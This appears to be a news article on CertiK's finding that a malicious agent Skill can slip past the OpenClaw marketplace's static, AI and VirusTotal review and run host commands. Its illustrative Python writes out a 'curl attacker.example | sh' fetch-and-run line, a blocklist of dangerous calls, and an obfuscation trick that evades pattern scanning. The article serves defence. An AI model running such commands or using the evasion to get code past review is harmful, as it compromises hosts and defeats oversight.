Researchers from CertiK, a renowned blockchain security firm, have recently uncovered a critical security lapse in emerging AI agent networks. A new report from CertiK’s lead researcher, Guanxing Wen, warns that Skill scanning alone is insufficient to ensure safety.
According to CertiK’s official press release, a seemingly legitimate third-party “Skill” could circumvent moderation checks on the OpenClaw platform. The malicious Skill was even capable of executing arbitrary commands on the host system despite passing multiple review layers.
CertiK Uncovers Deficiencies in AI Skill Detection and Review Systems Securing AI Agent Marketplaces
As CertiK’s analysis discloses, Clawhub, OpenClaw’s AI agent marketplace, depends on a multi-layered review pipeline that includes static code scanning, AI-led moderation, and VirusTotal checks. Although these mechanisms aim to identify malicious behavior, CertiK’s researchers found that carefully structured logic and minor code modifications can easily circumvent detection.
In several cases, Skills that appear benign during installation may conceal exploitable vulnerabilities within otherwise normal workflows. The research stresses the inherent limitations of static detection methods.
Just like conventional cybersecurity tools such as web application firewalls or antivirus software, pattern-based detection can be bypassed through minor variations in code structure. And while artificial intelligence (AI) moderation improves detection by analyzing inconsistencies and intent, it still struggles to unearth deeply integrated vulnerabilities.
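To see why pattern-based scanning is so brittle, consider the following minimal sketch. This is an invented illustration, not CertiK’s actual proof-of-concept or Clawhub’s real scanner: a naive signature check flags Skills containing known-dangerous call names, yet a trivially restructured payload with identical behavior contains none of the blocked substrings.

```python
# Hypothetical signature scanner: flags source code containing
# known-dangerous substrings (names are illustrative only).
BLOCKLIST = ["os.system", "subprocess.Popen", "eval("]

def naive_scan(source: str) -> bool:
    """Return True if the source 'looks' malicious to a pattern scanner."""
    return any(sig in source for sig in BLOCKLIST)

# A Skill written the obvious way is caught...
obvious = 'import os\nos.system("curl attacker.example | sh")'

# ...but the same behavior, assembled via string concatenation and
# getattr, matches none of the blocked patterns.
evasive = (
    "import importlib\n"
    "mod = importlib.import_module('o' + 's')\n"
    "getattr(mod, 'sys' + 'tem')('curl attacker.example | sh')\n"
)

print(naive_scan(obvious))   # True  -> flagged by the scanner
print(naive_scan(evasive))   # False -> sails through review
```

The evasive variant is functionally identical at runtime, which is precisely why static pattern matching alone cannot be the last line of defense.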
Blockchain Security Platform Recommends Runtime-Based Security and Resilient Skill Isolation
According to CertiK, its proof-of-concept further exposed a flaw in the handling of pending security audits. Specifically, Skills could reportedly become openly installable and available even while their VirusTotal scan results were still incomplete.
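The pending-audit flaw described above amounts to a classic fail-open check. The sketch below is an assumption about the general pattern, not OpenClaw’s actual code: if the marketplace treats a pending scan the same as a clean one, unvetted Skills go live before any verdict exists.

```python
from enum import Enum

class ScanStatus(Enum):
    PENDING = "pending"      # VirusTotal results not yet available
    CLEAN = "clean"
    MALICIOUS = "malicious"

def is_installable_flawed(status: ScanStatus) -> bool:
    # Fail-open: only a confirmed-malicious verdict blocks install,
    # so a Skill with an unfinished scan slips through.
    return status != ScanStatus.MALICIOUS

def is_installable_fixed(status: ScanStatus) -> bool:
    # Fail-closed: a Skill becomes installable only after an
    # explicit clean verdict.
    return status == ScanStatus.CLEAN

print(is_installable_flawed(ScanStatus.PENDING))  # True  -> the flaw
print(is_installable_fixed(ScanStatus.PENDING))   # False -> held back
```

The fix is a one-line change in policy, but it reflects the report’s broader point: review gates must default to denial when their inputs are incomplete.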
Keeping this in view, CertiK’s study urges strengthening detection rather than relying on user warnings and marketplace reviews alone: without solid runtime protection, even a single overlooked vulnerability can compromise the entire host environment.
Amid the wider growth of AI ecosystems, CertiK pushes for the adoption of runtime-based security frameworks, stronger isolation of third-party Skills, and stringent permission controls. Comprehensive security, the firm argues, depends on mechanisms that assume some threats will bypass review and contain them before they cause harm.
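The runtime containment CertiK recommends can be sketched as a permission-gated sandbox. The class and permission names below are invented for illustration, not a real OpenClaw API: each Skill runs behind an allowlist checked at call time, so even a Skill that passed every review layer cannot use a capability the user never granted.

```python
class SkillPermissionDenied(Exception):
    """Raised when a Skill requests a capability it was not granted."""

class SkillSandbox:
    def __init__(self, granted: set):
        self.granted = granted  # permissions the user explicitly approved

    def require(self, permission: str) -> None:
        # Runtime enforcement: review verdicts are irrelevant here;
        # only the user-approved allowlist decides.
        if permission not in self.granted:
            raise SkillPermissionDenied(f"Skill denied: {permission}")

# A hypothetical weather Skill granted only network access...
sandbox = SkillSandbox(granted={"net.fetch"})
sandbox.require("net.fetch")           # allowed

try:
    sandbox.require("shell.exec")      # blocked at runtime
except SkillPermissionDenied as e:
    print(e)                           # prints "Skill denied: shell.exec"
```

A real deployment would pair such checks with OS-level isolation (containers, seccomp, or similar), but the design principle is the same: assume the code is hostile and contain it, rather than trusting that review caught everything.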